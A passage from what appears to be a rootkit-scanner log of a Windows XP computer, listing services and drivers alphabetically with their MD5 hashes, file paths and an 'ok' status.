11:49:29.0046 1896 ialm (48846b31be5a4fa662ccfde7a1ba86b9) C:\WINDOWS\system32\DRIVERS\igxpmp32.sys
11:49:29.0500 1896 ialm - ok
11:49:29.0671 1896 iaStor (db0cc620b27a928d968c1a1e9cd9cb87) C:\WINDOWS\system32\drivers\iaStor.sys
11:49:29.0687 1896 iaStor - ok
11:49:29.0906 1896 idsvc (c01ac32dc5c03076cfb852cb5da5229c) C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
11:49:30.0031 1896 idsvc - ok
11:49:30.0078 1896 Imapi (083a052659f5310dd8b6a6cb05edcf8e) C:\WINDOWS\system32\DRIVERS\imapi.sys
11:49:30.0359 1896 Imapi - ok
11:49:30.0578 1896 ImapiService (30deaf54a9755bb8546168cfe8a6b5e1) C:\WINDOWS\system32\imapi.exe
11:49:31.0031 1896 ImapiService - ok
11:49:31.0093 1896 ini910u (4a40e045faee58631fd8d91afc620719) C:\WINDOWS\system32\DRIVERS\ini910u.sys
11:49:31.0359 1896 ini910u - ok
11:49:31.0859 1896 IntcAzAudAddService (cb1113029fae50c685198eabd9885161) C:\WINDOWS\system32\drivers\RtkHDAud.sys
11:49:32.0312 1896 IntcAzAudAddService - ok
11:49:32.0453 1896 IntelIde (b5466a9250342a7aa0cd1fba13420678) C:\WINDOWS\system32\DRIVERS\intelide.sys
11:49:32.0718 1896 IntelIde - ok
11:49:32.0921 1896 intelppm (8c953733d8f36eb2133f5bb58808b66b) C:\WINDOWS\system32\DRIVERS\intelppm.sys
11:49:33.0187 1896 intelppm - ok
11:49:33.0203 1896 Ip6Fw (3bb22519a194418d5fec05d800a19ad0) C:\WINDOWS\system32\DRIVERS\Ip6Fw.sys
11:49:33.0484 1896 Ip6Fw - ok
11:49:33.0656 1896 IpFilterDriver (731f22ba402ee4b62748adaf6363c182) C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
11:49:33.0921 1896 IpFilterDriver - ok
11:49:33.0953 1896 IpInIp (b87ab476dcf76e72010632b5550955f5) C:\WINDOWS\system32\DRIVERS\ipinip.sys
11:49:34.0218 1896 IpInIp - ok
11:49:34.0421 1896 IpNat (cc748ea12c6effde940ee98098bf96bb) C:\WINDOWS\system32\DRIVERS\ipnat.sys
11:49:34.0734 1896 IpNat - ok
11:49:34.0906 1896 IPSec (23c74d75e36e7158768dd63d92789a91) C:\WINDOWS\system32\DRIVERS\ipsec.sys
11:49:35.0187 1896 IPSec - ok
11:49:35.0375 1896 IRENUM (c93c9ff7b04d772627a3646d89f7bf89) C:\WINDOWS\system32\DRIVERS\irenum.sys
11:49:35.0484 1896 IRENUM - ok
11:49:35.0515 1896 isapnp (05a299ec56e52649b1cf2fc52d20f2d7) C:\WINDOWS\system32\DRIVERS\isapnp.sys
11:49:35.0796 1896 isapnp - ok
11:49:36.0046 1896 JavaQuickStarterService (9ae07549a0d691a103faf8946554bdb7) C:\Program Files\Java\jre6\bin\jqs.exe
11:49:36.0062 1896 JavaQuickStarterService - ok
11:49:36.0125 1896 Kbdclass (463c1ec80cd17420a542b7f36a36f128) C:\WINDOWS\system32\DRIVERS\kbdclass.sys
11:49:36.0406 1896 Kbdclass - ok
11:49:36.0593 1896 kmixer (692bcf44383d056aed41b045a323d378) C:\WINDOWS\system32\drivers\kmixer.sys
11:49:37.0031 1896 kmixer - ok
11:49:37.0078 1896 KSecDD (1705745d900dabf2d89f90ebaddc7517) C:\WINDOWS\system32\drivers\KSecDD.sys
11:49:37.0359 1896 KSecDD - ok
11:49:37.0562 1896 L1c (6c8658587e91ea25b0fd2e71781ad228) C:\WINDOWS\system32\DRIVERS\l1c51x86.sys
11:49:37.0625 1896 L1c - ok
11:49:37.0671 1896 LanmanServer (f385f4b02c535bffe1d70cab80838123) C:\WINDOWS\System32\srvsvc.dll
11:49:37.0953 1896 LanmanServer - ok
11:49:38.0015 1896 lanmanworkstation (1b67b632786fef1c1bbaef46c2f3f2e6) C:\WINDOWS\System32\wkssvc.dll
11:49:38.0281 1896 lanmanworkstation - ok
11:49:38.0281 1896 lbrtfdc - ok
11:49:38.0500 1896 LmHosts (a7db739ae99a796d91580147e919cc59) C:\WINDOWS\System32\lmhsvc.dll
11:49:38.0781 1896 LmHosts - ok
11:49:38.0968 1896 Messenger (986b1ff5814366d71e0ac5755c88f2d3) C:\WINDOWS\System32\msgsvc.dll
11:49:39.0234 1896 Messenger - ok
11:49:39.0500 1896 Microsoft Office Groove Audit Service (fafe367d032ed82e9332b4c741a20216) C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe
11:49:39.0531 1896 Microsoft Office Groove Audit Service - ok
11:49:39.0562 1896 mnmdd (4ae068242760a1fb6e1a44bf4e16afa6) C:\WINDOWS\system32\drivers\mnmdd.sys
11:49:39.0828 1896 mnmdd - ok
11:49:39.0875 1896 mnmsrvc (d18f1f0c101d06a1c1adf26eed16fcdd) C:\WINDOWS\system32\mnmsrvc.exe
11:49:40.0140 1896 mnmsrvc - ok
11:49:40.0171 1896 Modem (dfcbad3cec1c5f964962ae10e0bcc8e1) C:\WINDOWS\system32\drivers\Modem.sys
11:49:40.0453 1896 Modem - ok
11:49:40.0703 1896 Monfilt (9fa7207d1b1adead88ae8eed9cdbbaa5) C:\WINDOWS\system32\drivers\Monfilt.sys
11:49:40.0906 1896 Monfilt - ok
11:49:40.0921 1896 Mouclass (35c9e97194c8cfb8430125f8dbc34d04) C:\WINDOWS\system32\DRIVERS\mouclass.sys
11:49:41.0187 1896 Mouclass - ok
11:49:41.0375 1896 MountMgr (a80b9a0bad1b73637dbcbba7df72d3fd) C:\WINDOWS\system32\drivers\MountMgr.sys
11:49:41.0640 1896 MountMgr - ok
11:49:41.0812 1896 mraid35x (3f4bb95e5a44f3be34824e8e7caf0737) C:\WINDOWS\system32\DRIVERS\mraid35x.sys
11:49:42.0078 1896 mraid35x - ok
11:49:42.0109 1896 MRxDAV (11d42bb6206f33fbb3ba0288d3ef81bd) C:\WINDOWS\system32\DRIVERS\mrxdav.sys
11:49:42.0375 1896 MRxDAV - ok
11:49:42.0437 1896 MRxSmb (60ae98742484e7ab80c3c1450e708148) C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
11:49:42.0515 1896 MRxSmb - ok
11:49:42.0546 1896 MSDTC (a137f1470499a205abbb9aafb3b6f2b1) C:\WINDOWS\system32\msdtc.exe
11:49:42.0812 1896 MSDTC - ok
11:49:43.0015 1896 Msfs (c941ea2454ba8350021d774daf0f1027) C:\WINDOWS\system32\drivers\Msfs.sys
11:49:43.0281 1896 Msfs - ok
11:49:43.0281 1896 MSIServer - ok
11:49:43.0500 1896 MSKSSRV (d1575e71568f4d9e14ca56b7b0453bf1) C:\WINDOWS\system32\drivers\MSKSSRV.sys
11:49:43.0765 1896 MSKSSRV - ok
11:49:43.0812 1896 MSPCLOCK (325bb26842fc7ccc1fcce2c457317f3e) C:\WINDOWS\system32\drivers\MSPCLOCK.sys
11:49:44.0062 1896 MSPCLOCK - ok
11:49:44.0062 1896 MSPQM (bad59648ba099da4a17680b39730cb3d) C:\WINDOWS\system32\drivers\MSPQM.sys
11:49:44.0312 1896 MSPQM - ok
11:49:44.0359 1896 mssmbios (af5f4f3f14a8ea2c26de30f7a1e17136) C:\WINDOWS\system32\DRIVERS\mssmbios.sys
11:49:44.0609 1896 mssmbios - ok
11:49:44.0796 1896 MSTEE (e53736a9e30c45fa9e7b5eac55056d1d) C:\WINDOWS\system32\drivers\MSTEE.sys
11:49:45.0046 1896 MSTEE - ok
11:49:45.0062 1896 Mup (2f625d11385b1a94360bfc70aaefdee1) C:\WINDOWS\system32\drivers\Mup.sys
11:49:45.0328 1896 Mup - ok
11:49:45.0359 1896 NABTSFEC (5b50f1b2a2ed47d560577b221da734db) C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys
11:49:45.0609 1896 NABTSFEC - ok
11:49:45.0656 1896 napagent (0102140028fad045756796e1c685d695) C:\WINDOWS\System32\qagentrt.dll
11:49:45.0968 1896 napagent - ok
11:49:46.0015 1896 NDIS (1df7f42665c94b825322fae71721130d) C:\WINDOWS\system32\drivers\NDIS.sys
11:49:46.0281 1896 NDIS - ok
11:49:46.0312 1896 NdisIP (7ff1f1fd8609c149aa432f95a8163d97) C:\WINDOWS\system32\DRIVERS\NdisIP.sys
11:49:46.0546 1896 NdisIP - ok
11:49:46.0578 1896 NdisTapi (1ab3d00c991ab086e69db84b6c0ed78f) C:\WINDOWS\system32\DRIVERS\ndistapi.sys
11:49:46.0843 1896 NdisTapi - ok
11:49:46.0875 1896 Ndisuio (f927a4434c5028758a842943ef1a3849) C:\WINDOWS\system32\DRIVERS\ndisuio.sys
11:49:47.0125 1896 Ndisuio - ok
11:49:47.0140 1896 NdisWan (edc1531a49c80614b2cfda43ca8659ab) C:\WINDOWS\system32\DRIVERS\ndiswan.sys
11:49:47.0406 1896 NdisWan - ok
11:49:47.0421 1896 NDProxy (6215023940cfd3702b46abc304e1d45a) C:\WINDOWS\system32\drivers\NDProxy.sys
11:49:47.0703 1896 NDProxy - ok
11:49:47.0906 1896 NetBIOS (5d81cf9a2f1a3a756b66cf684911cdf0) C:\WINDOWS\system32\DRIVERS\netbios.sys
11:49:48.0171 1896 NetBIOS - ok
11:49:48.0218 1896 NetBT (74b2b2f5bea5e9a3dc021d685551bd3d) C:\WINDOWS\system32\DRIVERS\netbt.sys
11:49:48.0500 1896 NetBT - ok
11:49:48.0703 1896 NetDDE (b857ba82860d7ff85ae29b095645563b) C:\WINDOWS\system32\netdde.exe
11:49:48.0984 1896 NetDDE - ok
11:49:48.0984 1896 NetDDEdsdm (b857ba82860d7ff85ae29b095645563b) C:\WINDOWS\system32\netdde.exe
11:49:49.0250 1896 NetDDEdsdm - ok
11:49:49.0328 1896 Netlogon (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:49:49.0593 1896 Netlogon - ok
11:49:49.0781 1896 Netman (13e67b55b3abd7bf3fe7aae5a0f9a9de) C:\WINDOWS\System32\netman.dll
11:49:50.0046 1896 Netman - ok
11:49:50.0171 1896 NetTcpPortSharing (d34612c5d02d026535b3095d620626ae) C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
11:49:50.0203 1896 NetTcpPortSharing - ok
11:49:50.0265 1896 Nla (b4138e99236f0f57d4cf49bae98a0746) C:\WINDOWS\System32\mswsock.dll
11:49:50.0546 1896 Nla - ok
11:49:50.0593 1896 Npfs (3182d64ae053d6fb034f44b6def8034a) C:\WINDOWS\system32\drivers\Npfs.sys
11:49:50.0859 1896 Npfs - ok
11:49:50.0953 1896 Ntfs (78a08dd6a8d65e697c18e1db01c5cdca) C:\WINDOWS\system32\drivers\Ntfs.sys
11:49:51.0281 1896 Ntfs - ok
11:49:51.0281 1896 NtLmSsp (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:49:51.0531 1896 NtLmSsp - ok
11:49:51.0656 1896 NtmsSvc (156f64a3345bd23c600655fb4d10bc08) C:\WINDOWS\system32\ntmssvc.dll
11:49:51.0953 1896 NtmsSvc - ok
11:49:51.0984 1896 Null (73c1e1f395918bc2c6dd67af7591a3ad) C:\WINDOWS\system32\drivers\Null.sys
11:49:52.0265 1896 Null - ok
11:49:52.0281 1896 NwlnkFlt (b305f3fad35083837ef46a0bbce2fc57) C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
11:49:52.0562 1896 NwlnkFlt - ok
11:49:52.0750 1896 NwlnkFwd (c99b3415198d1aab7227f2c88fd664b9) C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
11:49:53.0000 1896 NwlnkFwd - ok
11:49:53.0125 1896 odserv (84de1dd996b48b05ace31ad015fa108a) C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
11:49:53.0187 1896 odserv - ok
11:49:53.0265 1896 ose (5a432a042dae460abe7199b758e8606c) C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
11:49:53.0296 1896 ose - ok
11:49:53.0343 1896 Parport (5575faf8f97ce5e713d108c2a58d7c7c) C:\WINDOWS\system32\drivers\Parport.sys
11:49:53.0640 1896 Parport - ok
11:49:53.0843 1896 PartMgr (beb3ba25197665d82ec7065b724171c6) C:\WINDOWS\system32\drivers\PartMgr.sys
11:49:54.0109 1896 PartMgr - ok
11:49:54.0312 1896 ParVdm (70e98b3fd8e963a6a46a2e6247e0bea1) C:\WINDOWS\system32\drivers\ParVdm.sys
11:49:54.0578 1896 ParVdm - ok
11:49:54.0593 1896 PCI (a219903ccf74233761d92bef471a07b1) C:\WINDOWS\system32\DRIVERS\pci.sys
11:49:54.0843 1896 PCI - ok
11:49:54.0859 1896 PCIDump - ok
11:49:54.0875 1896 PCIIde (ccf5f451bb1a5a2a522a76e670000ff0) C:\WINDOWS\system32\DRIVERS\pciide.sys
11:49:55.0296 1896 PCIIde - ok
11:49:55.0484 1896 Pcmcia (9e89ef60e9ee05e3f2eef2da7397f1c1) C:\WINDOWS\system32\drivers\Pcmcia.sys
11:49:55.0765 1896 Pcmcia - ok
11:49:55.0765 1896 PDCOMP - ok
11:49:55.0781 1896 PDFRAME - ok
11:49:55.0796 1896 PDRELI - ok
11:49:55.0796 1896 PDRFRAME - ok
11:49:55.0953 1896 perc2 (6c14b9c19ba84f73d3a86dba11133101) C:\WINDOWS\system32\DRIVERS\perc2.sys
11:49:56.0203 1896 perc2 - ok
11:49:56.0406 1896 perc2hib (f50f7c27f131afe7beba13e14a3b9416) C:\WINDOWS\system32\DRIVERS\perc2hib.sys
11:49:56.0671 1896 perc2hib - ok
11:49:56.0875 1896 PlugPlay (65df52f5b8b6e9bbd183505225c37315) C:\WINDOWS\system32\services.exe
11:49:56.0906 1896 PlugPlay - ok
11:49:56.0937 1896 PolicyAgent (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:49:57.0203 1896 PolicyAgent - ok
11:49:57.0390 1896 PptpMiniport (efeec01b1d3cf84f16ddd24d9d9d8f99) C:\WINDOWS\system32\DRIVERS\raspptp.sys
11:49:57.0671 1896 PptpMiniport - ok
11:49:57.0687 1896 ProtectedStorage (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:49:57.0937 1896 ProtectedStorage - ok
11:49:57.0953 1896 PSched (09298ec810b07e5d582cb3a3f9255424) C:\WINDOWS\system32\DRIVERS\psched.sys
11:49:58.0218 1896 PSched - ok
11:49:58.0234 1896 Ptilink (80d317bd1c3dbc5d4fe7b1678c60cadd) C:\WINDOWS\system32\DRIVERS\ptilink.sys
11:49:58.0484 1896 Ptilink - ok
11:49:58.0515 1896 ql1080 (0a63fb54039eb5662433caba3b26dba7) C:\WINDOWS\system32\DRIVERS\ql1080.sys
11:49:58.0796 1896 ql1080 - ok
11:49:59.0000 1896 Ql10wnt (6503449e1d43a0ff0201ad5cb1b8c706) C:\WINDOWS\system32\DRIVERS\ql10wnt.sys
11:49:59.0265 1896 Ql10wnt - ok
11:49:59.0312 1896 ql12160 (156ed0ef20c15114ca097a34a30d8a01) C:\WINDOWS\system32\DRIVERS\ql12160.sys
11:49:59.0562 1896 ql12160 - ok
11:49:59.0765 1896 ql1240 (70f016bebde6d29e864c1230a07cc5e6) C:\WINDOWS\system32\DRIVERS\ql1240.sys
11:50:00.0734 1896 ql1240 - ok
11:50:00.0750 1896 ql1280 (907f0aeea6bc451011611e732bd31fcf) C:\WINDOWS\system32\DRIVERS\ql1280.sys
11:50:01.0015 1896 ql1280 - ok
11:50:01.0078 1896 RasAcd (fe0d99d6f31e4fad8159f690d68ded9c) C:\WINDOWS\system32\DRIVERS\rasacd.sys
11:50:01.0328 1896 RasAcd - ok
11:50:01.0390 1896 RasAuto (ad188be7bdf94e8df4ca0a55c00a5073) C:\WINDOWS\System32\rasauto.dll
11:50:01.0656 1896 RasAuto - ok
11:50:01.0718 1896 Rasl2tp (11b4a627bc9614b885c4969bfa5ff8a6) C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
11:50:01.0984 1896 Rasl2tp - ok
11:50:02.0015 1896 RasMan (76a9a3cbeadd68cc57cda5e1d7448235) C:\WINDOWS\System32\rasmans.dll
11:50:02.0312 1896 RasMan - ok
11:50:02.0312 1896 RasPppoe (5bc962f2654137c9909c3d4603587dee) C:\WINDOWS\system32\DRIVERS\raspppoe.sys
11:50:02.0578 1896 RasPppoe - ok
11:50:02.0593 1896 Raspti (fdbb1d60066fcfbb7452fd8f9829b242) C:\WINDOWS\system32\DRIVERS\raspti.sys
11:50:02.0875 1896 Raspti - ok
11:50:02.0921 1896 Rdbss (7ad224ad1a1437fe28d89cf22b17780a) C:\WINDOWS\system32\DRIVERS\rdbss.sys
11:50:03.0203 1896 Rdbss - ok
11:50:03.0234 1896 RDPCDD (4912d5b403614ce99c28420f75353332) C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
11:50:03.0500 1896 RDPCDD - ok
11:50:03.0703 1896 rdpdr (15cabd0f7c00c47c70124907916af3f1) C:\WINDOWS\system32\DRIVERS\rdpdr.sys
11:50:03.0984 1896 rdpdr - ok
11:50:04.0015 1896 RDPWD (6728e45b66f93c08f11de2e316fc70dd) C:\WINDOWS\system32\drivers\RDPWD.sys
11:50:04.0281 1896 RDPWD - ok
11:50:04.0328 1896 RDSessMgr (3c37bf86641bda977c3bf8a840f3b7fa) C:\WINDOWS\system32\sessmgr.exe
11:50:04.0593 1896 RDSessMgr - ok
11:50:04.0640 1896 redbook (f828dd7e1419b6653894a8f97a0094c5) C:\WINDOWS\system32\DRIVERS\redbook.sys
11:50:04.0906 1896 redbook - ok
11:50:04.0968 1896 RemoteAccess (7e699ff5f59b5d9de5390e3c34c67cf5) C:\WINDOWS\System32\mprdim.dll
11:50:05.0234 1896 RemoteAccess - ok
11:50:05.0453 1896 RpcLocator (aaed593f84afa419bbae8572af87cf6a) C:\WINDOWS\system32\locator.exe
11:50:05.0718 1896 RpcLocator - ok
11:50:05.0781 1896 RpcSs (6b27a5c03dfb94b4245739065431322c) C:\WINDOWS\System32\rpcss.dll
11:50:05.0828 1896 RpcSs - ok
11:50:05.0875 1896 RSUSBSTOR (7ffa9821b1c5e0e0667e0a2685cfb89f) C:\WINDOWS\system32\Drivers\RtsUStor.sys
11:50:05.0921 1896 RSUSBSTOR - ok
11:50:05.0968 1896 RSVP (471b3f9741d762abe75e9deea4787e47) C:\WINDOWS\system32\rsvp.exe
11:50:06.0234 1896 RSVP - ok
11:50:06.0234 1896 Rts516xIR - ok
11:50:06.0437 1896 SamSs (bf2466b3e18e970d8a976fb95fc1ca85) C:\WINDOWS\system32\lsass.exe
11:50:06.0703 1896 SamSs - ok
11:50:07.0046 1896 SamsungAllShareV2.0 (328100af2efd951eab657384ec361b6f) C:\Program Files\Samsung\AllShare\AllShareDMS\AllShareDMS.exe
11:50:07.0078 1896 SamsungAllShareV2.0 - ok
11:50:07.0125 1896 SCardSvr (86d007e7a654b9a71d1d7d856b104353) C:\WINDOWS\System32\SCardSvr.exe
11:50:07.0406 1896 SCardSvr - ok
11:50:07.0437 1896 Schedule (0a9a7365a1ca4319aa7c1d6cd8e4eafa) C:\WINDOWS\system32\schedsvc.dll
11:50:07.0703 1896 Schedule - ok
11:50:07.0734 1896 Secdrv (90a3935d05b494a5a39d37e71f09a677) C:\WINDOWS\system32\DRIVERS\secdrv.sys
11:50:07.0828 1896 Secdrv - ok
11:50:07.0859 1896 seclogon (cbe612e2bb6a10e3563336191eda1250) C:\WINDOWS\System32\seclogon.dll
11:50:08.0125 1896 seclogon - ok
11:50:08.0156 1896 SENS (7fdd5d0684eca8c1f68b4d99d124dcd0) C:\WINDOWS\system32\sens.dll
11:50:08.0437 1896 SENS - ok
11:50:08.0453 1896 Serial (cca207a8896d4c6a0c9ce29a4ae411a7) C:\WINDOWS\system32\drivers\Serial.sys
11:50:08.0718 1896 Serial - ok
11:50:08.0750 1896 Sfloppy (8e6b8c671615d126fdc553d1e2de5562) C:\WINDOWS\system32\drivers\Sfloppy.sys
11:50:09.0031 1896 Sfloppy - ok
11:50:09.0093 1896 SharedAccess (83f41d0d89645d7235c051ab1d9523ac) C:\WINDOWS\System32\ipnathlp.dll
11:50:09.0390 1896 SharedAccess - ok
11:50:09.0437 1896 ShellHWDetection (1926899bf9ffe2602b63074971700412) C:\WINDOWS\System32\shsvcs.dll
11:50:09.0687 1896 ShellHWDetection - ok
11:50:09.0703 1896 Simbad - ok
11:50:09.0750 1896 SimpleSlideShowServer (1980fe1f5a32067dad1d8776b63c2669) C:\Program Files\Samsung\AllShare\AllShareSlideShowService.exe
11:50:09.0765 1896 SimpleSlideShowServer - ok
11:50:09.0796 1896 sisagp (6b33d0ebd30db32e27d1d78fe946a754) C:\WINDOWS\system32\DRIVERS\sisagp.sys
11:50:10.0046 1896 sisagp - ok
11:50:10.0093 1896 SLIP (866d538ebe33709a5c9f5c62b73b7d14) C:\WINDOWS\system32\DRIVERS\SLIP.sys
11:50:10.0328 1896 SLIP - ok
11:50:10.0468 1896 SNP2UVC (c792610f7d2009352721c1ae38da0619) C:\WINDOWS\system32\DRIVERS\snp2uvc.sys
11:50:10.0656 1896 SNP2UVC - ok
11:50:10.0796 1896 Sparrow (83c0f71f86d3bdaf915685f3d568b20e) C:\WINDOWS\system32\DRIVERS\sparrow.sys
11:50:10.0906 1896 Sparrow - ok
11:50:10.0937 1896 splitter (ab8b92451ecb048a4d1de7c3ffcb4a9f) C:\WINDOWS\system32\drivers\splitter.sys
11:50:11.0171 1896 splitter - ok
11:50:11.0234 1896 Spooler (d8e14a61acc1d4a6cd0d38aebac7fa3b) C:\WINDOWS\system32\spoolsv.exe
11:50:11.0500 1896 Spooler - ok
11:50:11.0546 1896 sr (76bb022c2fb6902fd5bdd4f78fc13a5d) C:\WINDOWS\system32\DRIVERS\sr.sys
11:50:11.0656 1896 sr - ok
11:50:11.0703 1896 srservice (3805df0ac4296a34ba4bf93b346cc378) C:\WINDOWS\system32\srsvc.dll
11:50:11.0828 1896 srservice - ok
11:50:11.0921 1896 Srv (3bb03f2ba89d2be417206c373d2af17c) C:\WINDOWS\system32\DRIVERS\srv.sys
11:50:11.0984 1896 Srv - ok
11:50:12.0031 1896 SSDPSRV (0a5679b3714edab99e357057ee88fca6) C:\WINDOWS\System32\ssdpsrv.dll
11:50:12.0140 1896 SSDPSRV - ok
11:50:12.0203 1896 stisvc (8bad69cbac032d4bbacfce0306174c30) C:\WINDOWS\system32\wiaservc.dll
11:50:12.0515 1896 stisvc - ok
11:50:12.0562 1896 streamip (77813007ba6265c4b6098187e6ed79d2) C:\WINDOWS\system32\DRIVERS\StreamIP.sys
11:50:12.0828 1896 streamip - ok
11:50:12.0843 1896 swenum (3941d127aef12e93addf6fe6ee027e0f) C:\WINDOWS\system32\DRIVERS\swenum.sys
11:50:13.0109 1896 swenum - ok
11:50:13.0140 1896 swmidi (8ce882bcc6cf8a62f2b2323d95cb3d01) C:\WINDOWS\system32\drivers\swmidi.sys
11:50:13.0421 1896 swmidi - ok
11:50:13.0421 1896 SwPrv - ok
11:50:13.0609 1896 symc810 (1ff3217614018630d0a6758630fc698c) C:\WINDOWS\system32\DRIVERS\symc810.sys
11:50:13.0859 1896 symc810 - ok
11:50:13.0890 1896 symc8xx (070e001d95cf725186ef8b20335f933c) C:\WINDOWS\system32\DRIVERS\symc8xx.sys
11:50:14.0140 1896 symc8xx - ok
11:50:14.0343 1896 sym_hi (80ac1c4abbe2df3b738bf15517a51f2c) C:\WINDOWS\system32\DRIVERS\sym_hi.sys
11:50:14.0593 1896 sym_hi - ok
11:50:14.0609 1896 sym_u3 (bf4fab949a382a8e105f46ebb4937058) C:\WINDOWS\system32\DRIVERS\sym_u3.sys
11:50:14.0859 1896 sym_u3 - ok
11:50:14.0968 1896 SynTP (5c3e900f41426a372de60675afc8aa07) C:\WINDOWS\system32\DRIVERS\SynTP.sys
11:50:14.0984 1896 SynTP - ok
11:50:15.0031 1896 sysaudio (8b83f3ed0f1688b4958f77cd6d2bf290) C:\WINDOWS\system32\drivers\sysaudio.sys
11:50:15.0296 1896 sysaudio - ok
11:50:15.0500 1896 SysmonLog (c7abbc59b43274b1109df6b24d617051) C:\WINDOWS\system32\smlogsvc.exe
11:50:15.0750 1896 SysmonLog - ok
11:50:15.0796 1896 TapiSrv (3cb78c17bb664637787c9a1c98f79c38) C:\WINDOWS\System32\tapisrv.dll
11:50:16.0078 1896 TapiSrv - ok
11:50:16.0109 1896 Tcpip (93ea8d04ec73a85db02eb8805988f733) C:\WINDOWS\system32\DRIVERS\tcpip.sys
11:50:16.0406 1896 Tcpip - ok
11:50:16.0437 1896 TDPIPE (6471a66807f5e104e4885f5b67349397) C:\WINDOWS\system32\drivers\TDPIPE.sys
11:50:16.0703 1896 TDPIPE - ok
11:50:16.0718 1896 TDTCP (c56b6d0402371cf3700eb322ef3aaf61) C:\WINDOWS\system32\drivers\TDTCP.sys
11:50:16.0968 1896 TDTCP - ok
11:50:17.0000 1896 TermDD (88155247177638048422893737429d9e) C:\WINDOWS\system32\DRIVERS\termdd.sys
11:50:17.0281 1896 TermDD - ok
11:50:17.0500 1896 TermService (ff3477c03be7201c294c35f684b3479f) C:\WINDOWS\System32\termsrv.dll
11:50:17.0781 1896 TermService - ok
11:50:17.0796 1896 Themes (1926899bf9ffe2602b63074971700412) C:\WINDOWS\System32\shsvcs.dll
11:50:18.0062 1896 Themes - ok
11:50:18.0093 1896 TosIde (f2790f6af01321b172aa62f8e1e187d9) C:\WINDOWS\system32\DRIVERS\toside.sys
11:50:18.0343 1896 TosIde - ok
11:50:18.0375 1896 TrkWks (55bca12f7f523d35ca3cb833c725f54e) C:\WINDOWS\system32\trkwks.dll
11:50:18.0640 1896 TrkWks - ok
11:50:18.0953 1896 uagqecsvc (c49adf4fdcc2c1493197b2df528c9485) C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe
11:50:18.0984 1896 uagqecsvc - ok
11:50:19.0015 1896 Udfs (5787b80c2e3c5e2f56c2a233d91fa2c9) C:\WINDOWS\system32\drivers\Udfs.sys
11:50:19.0296 1896 Udfs - ok
11:50:19.0500 1896 ultra (1b698a51cd528d8da4ffaed66dfc51b9) C:\WINDOWS\system32\DRIVERS\ultra.sys
11:50:19.0593 1896 ultra - ok
11:50:19.0640 1896 UMWdf (c81b8635dee0d3ef5f64b3dd643023a5) C:\WINDOWS\system32\wdfmgr.exe
11:50:19.0703 1896 UMWdf - ok
11:50:19.0734 1896 Update (402ddc88356b1bac0ee3dd1580c76a31) C:\WINDOWS\system32\DRIVERS\update.sys
11:50:20.0062 1896 Update - ok
11:50:20.0109 1896 upnphost (1ebafeb9a3fbdc41b8d9c7f0f687ad91) C:\WINDOWS\System32\upnphost.dll
11:50:20.0218 1896 upnphost - ok
11:50:20.0234 1896 UPS (05365fb38fca1e98f7a566aaaf5d1815) C:\WINDOWS\System32\ups.exe
11:50:20.0515 1896 UPS - ok
11:50:20.0734 1896 usbccgp (173f317ce0db8e21322e71b7e60a27e8) C:\WINDOWS\system32\DRIVERS\usbccgp.sys
11:50:20.0984 1896 usbccgp - ok
11:50:20.0984 1896 USBCCID - ok
11:50:21.0031 1896 usbehci (65dcf09d0e37d4c6b11b5b0b76d470a7) C:\WINDOWS\system32\DRIVERS\usbehci.sys
11:50:21.0296 1896 usbehci - ok
11:50:21.0328 1896 usbhub (1ab3cdde553b6e064d2e754efe20285c) C:\WINDOWS\system32\DRIVERS\usbhub.sys
11:50:21.0609 1896 usbhub - ok
11:50:21.0781 1896 usbprint (a717c8721046828520c9edf31288fc00) C:\WINDOWS\system32\DRIVERS\usbprint.sys
11:50:22.0046 1896 usbprint - ok
11:50:22.0093 1896 USBSTOR (a32426d9b14a089eaa1d922e0c5801a9) C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
11:50:22.0343 1896 USBSTOR - ok
11:50:22.0359 1896 usbuhci (26496f9dee2d787fc3e61ad54821ffe6) C:\WINDOWS\system32\DRIVERS\usbuhci.sys
11:50:22.0796 1896 usbuhci - ok
11:50:22.0968 1896 usbvideo (63bbfca7f390f4c49ed4b96bfb1633e0) C:\WINDOWS\system32\Drivers\usbvideo.sys
11:50:23.0218 1896 usbvideo - ok
11:50:23.0250 1896 VgaSave (0d3a8fafceacd8b7625cd549757a7df1) C:\WINDOWS\System32\drivers\vga.sys
11:50:23.0500 1896 VgaSave - ok
11:50:23.0531 1896 viaagp (754292ce5848b3738281b4f3607eaef4) C:\WINDOWS\system32\DRIVERS\viaagp.sys
11:50:23.0781 1896 viaagp - ok
11:50:23.0796 1896 ViaIde (3b3efcda263b8ac14fdf9cbdd0791b2e) C:\WINDOWS\system32\DRIVERS\viaide.sys
11:50:24.0046 1896 ViaIde - ok
11:50:24.0062 1896 VolSnap (4c8fcb5cc53aab716d810740fe59d025) C:\WINDOWS\system32\drivers\VolSnap.sys
11:50:24.0328 1896 VolSnap - ok
11:50:24.0375 1896 VSS (7a9db3a67c333bf0bd42e42b8596854b) C:\WINDOWS\System32\vssvc.exe
11:50:24.0500 1896 VSS - ok
11:50:24.0531 1896 W32Time (54af4b1d5459500ef0937f6d33b1914f) C:\WINDOWS\system32\w32time.dll
11:50:24.0812 1896 W32Time - ok
11:50:24.0843 1896 Wanarp (e20b95baedb550f32dd489265c1da1f6) C:\WINDOWS\system32\DRIVERS\wanarp.sys
11:50:25.0093 1896 Wanarp - ok
11:50:25.0156 1896 Wdf01000 (bbcfeab7e871cddac2d397ee7fa91fdc) C:\WINDOWS\system32\Drivers\wdf01000.sys
